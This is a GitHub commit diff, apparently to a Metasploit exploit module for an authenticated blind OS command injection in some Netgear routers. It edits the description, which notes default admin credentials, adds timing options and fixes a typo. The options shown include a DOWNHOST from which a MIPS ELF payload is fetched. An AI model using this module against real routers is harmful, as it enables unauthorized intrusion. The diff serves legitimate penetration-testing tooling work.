You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Some Netgear Routers are vulnerable to an authenticated OS command injection.
23
-
Default credentials for the web interface are admin/admin or admin/password.
24
-
Since it is a blind os command injection vulnerability, there is no output for the
25
-
executed command when using the cmd generic payload. A ping command against a
26
-
controlled system could be used for testing purposes.
27
-
28
-
WARNING: We overwrite parts of the PPPOE configuration! Backup it prior using this module!
22
+
Some Netgear Routers are vulnerable to an authenticated OS command injection
23
+
on their web interface. Default credentials for the web interface are admin/admin
24
+
or admin/password. Since it is a blind os command injection vulnerability, there
25
+
is no output for the executed command when using the cmd generic payload. A ping
26
+
command against a controlled system could be used for testing purposes. This module
27
+
overwrites parts of the PPOE configuration, while the module tries to restore it
28
+
after exploitation configuration backup is recommended.
29
29
},
30
30
'Author'=>
31
31
[
@@ -71,7 +71,8 @@ def initialize(info = {})
71
71
OptString.new('PASSWORD',[true,'The password for the specified username','password']),
72
72
OptAddress.new('DOWNHOST',[false,'An alternative host to request the MIPS payload from']),
73
73
OptString.new('DOWNFILE',[false,'Filename to download, (default: random)']),
74
-
OptInt.new('HTTP_DELAY',[true,'Time that the HTTP Server will wait for the ELF payload request',45])
74
+
OptInt.new('HTTP_DELAY',[true,'Time that the HTTP Server will wait for the ELF payload request',60]),
75
+
OptInt.new('RELOAD_CONF_DELAY',[true,'Time to wait to allow the remote device to load configuration',45])
75
76
],self.class)
76
77
end
77
78
@@ -96,7 +97,7 @@ def grab_config(user,pass)
96
97
end
97
98
if[200,301,302].include?(res.code)
98
99
ifres.body =~ /pppoe_username/
99
-
print_good("#{rhost}:#{rport} - Successful downloaded the configuration")
100
+
print_good("#{rhost}:#{rport} - Successfully downloaded the configuration")
100
101
else
101
102
fail_with(Exploit::Failure::NoAccess,"#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported")
0 commit comments